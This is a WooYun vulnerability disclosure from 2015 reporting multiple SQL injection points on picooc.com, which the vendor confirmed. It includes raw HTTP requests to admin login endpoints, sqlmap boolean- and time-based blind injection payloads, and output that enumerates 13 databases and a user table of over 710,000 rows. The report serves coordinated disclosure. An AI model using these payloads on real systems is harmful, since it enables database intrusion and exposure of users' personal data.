当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2015-123773

漏洞标题: 有品网多处SQL注入打包提交(涉及至少13个库影响71万+用户信息)

相关厂商: picooc.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间: 2015-07-01 09:49

公开时间: 2015-08-15 09:54

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-15: 细节向公众公开

简要描述:

天地本不仁 万物为刍狗

【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

1.

POST数据包:



code 区域
POST /picooc/admin/login.php HTTP/1.1
Content-Length: 99
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.picooc.com:80/
Cookie: PHPSESSID=5rqj5m2e3vgj1d5uk82sp596q6; Hm_lvt_973df559cb578de9c3c4b8c03b1a03a0=1435657707,1435657720,1435657731,1435657733; Hm_lpvt_973df559cb578de9c3c4b8c03b1a03a0=1435657733; HMACCOUNT=50E0F9300006484F
Host: www.picooc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

login=login&password=admin&username=admin





参数 username 可注入 这个点 比上一个点好跑



0.png





1.png





于是跑了下 picooc 数据库(96个表)



4.png





看见了个 user 的表 跑了下数量 结果看见了 717362 我想问下 那个 dayima_id 是那啥不?



3.png



code 区域
POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 531 HTTP(s) req
uests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: login=login&password=admin&username=admin' AND 2537=2537 AND 'dGBa'
='dGBa

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: login=login&password=admin&username=admin' AND (SELECT * FROM (SELE
CT(SLEEP(5)))AWel) AND 'sutb'='sutb
---
[18:43:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5.0.12
[18:43:41] [INFO] fetching database names
[18:43:41] [INFO] fetching number of databases
[18:43:41] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:43:41] [INFO] retrieved: 13
[18:43:43] [INFO] retrieved: information_schema
[18:43:59] [INFO] retrieved: cdcol
[18:44:05] [INFO] retrieved: geo
[18:44:08] [INFO] retrieved: mysql
[18:44:13] [INFO] retrieved: performance_schema
[18:44:34] [INFO] retrieved: picooc
[18:44:43] [INFO] retrieved: picooc_bak
[18:44:56] [INFO] retrieved: picooc_bbs
[18:45:04] [INFO] retrieved: picooc_cms
[18:45:12] [INFO] retrieved: picooc_dev
[18:45:20] [INFO] retrieved: picooc_pms
[18:45:27] [INFO] retrieved: picooc_www
[18:45:33] [INFO] retrieved: test
available databases [13]:
[*] cdcol
[*] geo
[*] information_schema
[*] mysql
[*] performance_schema
[*] picooc
[*] picooc_bak
[*] picooc_bbs
[*] picooc_cms
[*] picooc_dev
[*] picooc_pms
[*] picooc_www
[*] test

[18:45:44] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.picooc.com'

[*] shutting down at 18:45:44



2.http://www.picooc.com/picooc/web_interface/?last_id=1&method=ditu&ver=99



参数 lasr_id 可注入



0.png







code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: last_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: last_id=1 AND 4846=4846&method=ditu&ver=99
---
[19:22:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5
[19:22:10] [INFO] fetching database names
[19:22:10] [INFO] fetching number of databases
[19:22:10] [INFO] resumed: 13
[19:22:10] [INFO] resumed: information_schema
[19:22:10] [INFO] resumed: cdcol
[19:22:10] [INFO] resumed: geo
[19:22:10] [INFO] resumed: m

漏洞证明:

3.POST数据包:



code 区域
POST /cmsadmin/php/action.php HTTP/1.1
Content-Length: 106
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.picooc.com:80/
Cookie: PHPSESSID=5rqj5m2e3vgj1d5uk82sp596q6; Hm_lvt_973df559cb578de9c3c4b8c03b1a03a0=1435657707,1435657720,1435657731,1435657733; Hm_lpvt_973df559cb578de9c3c4b8c03b1a03a0=1435657733; HMACCOUNT=50E0F9300006484F
Host: www.picooc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

action=login&password=-1&username=wsirjsba





参数 password 和 username 均可注入 这里以 password 演示



0.png





13个数据库 跑起来 太慢了 就不跑了



1.png



code 区域
sqlmap identified the following injection points with a total of 422 HTTP(s) req
uests:
---
Parameter: password (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=login&password=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))EBvX
) AND 'ZBYC'='ZBYC&username=wsirjsba
---
[18:38:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5.0.12
[18:38:14] [INFO] fetching database names
[18:38:14] [INFO] fetching number of databases
[18:38:14] [INFO] retrieved:
[18:38:14] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
13
[18:38:35] [INFO] retrieved: ii
[18:39:09] [INFO] retrieved:
[18:39:09] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[18:39:09] [INFO] retrieved:
[18:39:48] [ERROR] invalid character detected. retrying..
geo
[18:41:00] [INFO] retrieved: mysql
[18:42:47] [INFO] retrieved:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-01 09:52

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-07-01 09:50 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:1377 漏洞数:356 | 专业小厂三百年 信赖 源于品质保证 ...)
    0

    ···真心酸···又给我打包了····

  2. 2015-07-01 10:24 | 染血の雪 ( 普通白帽子 | Rank:247 漏洞数:35 | 你挖 或者不挖 漏洞就在哪儿 不会增加 不...)
    0

    要你分开发刷rank

登录后才能发表评论,请先 登录